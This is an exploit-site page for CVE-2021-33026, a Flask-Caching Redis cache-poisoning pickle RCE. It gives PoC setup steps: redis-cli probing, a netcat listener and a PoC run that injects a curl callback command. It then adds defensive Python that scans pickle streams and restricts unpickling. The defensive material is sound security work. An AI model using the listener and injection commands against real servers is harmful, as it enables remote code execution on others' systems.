## https://sploitus.com/exploit?id=FB7F4DA4-34A7-58CD-945D-6210A6F69011
Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit

--------------------------------------------------

Check that the Redis server is up and running, then list the existing keys and read one of them:

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys '*'

redis-cli get [Keyid]

-------------------------

Start a netcat listener on port 10001:

nc -nvlp 10001

-------------------------

Set up a virtual environment for Flask-Caching:

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>/bin/activate    (on Windows: venv_flask_cache_<lib_ver>\Scripts\activate)

pip install -r <requirement.txt>

Do the same to set up an environment for Flask-Caching 2.3.0.


Run the Flask app and create a cache key:

flask run

curl --header "Content-Type: application/json" --request POST --data {\"key\":\"Cachelib_2.3\"} http://localhost:5000/cache/new

Get the cached value for that key from the Flask app:

curl --request GET http://localhost:5000/cache/[key]

Exploit Flask-Caching by poisoning the Redis cache:

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a
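The root cause of the PoC above is that cache entries in Redis are pickled, so whoever can write to Redis controls what the Flask app unpickles. The following is an added defensive example, not part of the PoC or of Flask-Caching itself: a static scanner that walks a pickle stream with `pickletools` without executing it and flags global references and call opcodes (legitimate cache values such as strings and dicts contain none), plus an allowlist unpickler that refuses any global not explicitly permitted. The sample pickles and the `SAFE_GLOBALS` allowlist are constructed here for the demonstration.

```python
"""Defensive checks for pickle-based cache entries (added example, not part of the PoC).

Flask-Caching's Redis backend stores entries with pickle, so anyone who can
write to the Redis instance can plant a payload that runs when the app loads
the key. Two checks a defender can run over cache contents:

  1. inspect_pickle() walks the opcode stream with pickletools *without*
     executing it and reports every global reference and every opcode that
     calls a callable. Plain cache values (str, int, dict, list) have none.
  2. restricted_loads() is an allowlist unpickler: any global outside
     SAFE_GLOBALS aborts the load instead of importing it.
"""
import datetime
import io
import pickle
import pickletools

# Opcodes that push a str; STACK_GLOBAL (protocol 4+) consumes the last two.
_STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}
# Opcodes that invoke a callable or a constructor/state hook during load.
_CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

# Globals a cache value may reference. Empty = plain data only (assumption for
# this demo); extend deliberately, e.g. ("datetime", "date"), if the app caches
# such types.
SAFE_GLOBALS = set()  # set of (module, name) tuples


def inspect_pickle(data: bytes) -> dict:
    """Static scan of a pickle stream; never executes it."""
    found_globals, calls, strings = [], [], []
    try:
        for op, arg, _pos in pickletools.genops(data):
            if op.name in _STRING_OPS:
                strings.append(arg)
            elif op.name == "GLOBAL":          # arg is "module name"
                module, _, name = arg.partition(" ")
                found_globals.append((module, name))
            elif op.name == "STACK_GLOBAL":    # module and name were pushed as strs
                pair = tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?")
                found_globals.append(pair)
            elif op.name in _CALL_OPS:
                calls.append(op.name)
    except ValueError as exc:                  # truncated or malformed stream
        return {"globals": found_globals, "calls": calls,
                "malformed": str(exc), "suspicious": True}
    return {"globals": found_globals, "calls": calls, "malformed": None,
            "suspicious": bool(found_globals or calls)}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global that is not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_safely(data: bytes) -> bool:
    """True if the allowlist unpickler accepts the stream, False if it refuses."""
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


# Constructed samples: a value like the one the PoC's curl call caches, and a
# value that references a global plus a REDUCE call (a harmless datetime.date
# is enough to show what the scanner flags).
CLEAN_SAMPLE = pickle.dumps({"key": "Cachelib_2.3"}, protocol=4)
GLOBAL_SAMPLE = pickle.dumps(datetime.date(2021, 5, 1), protocol=4)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("global", GLOBAL_SAMPLE)):
        print(label, inspect_pickle(sample), "loads_safely:", loads_safely(sample))
```

Run it over the raw bytes of each entry fetched from Redis to spot planted values; the scan is detection only, and the durable fix is to keep untrusted data out of the unpickler (authenticated, network-isolated Redis, or a non-pickle serializer for cache values).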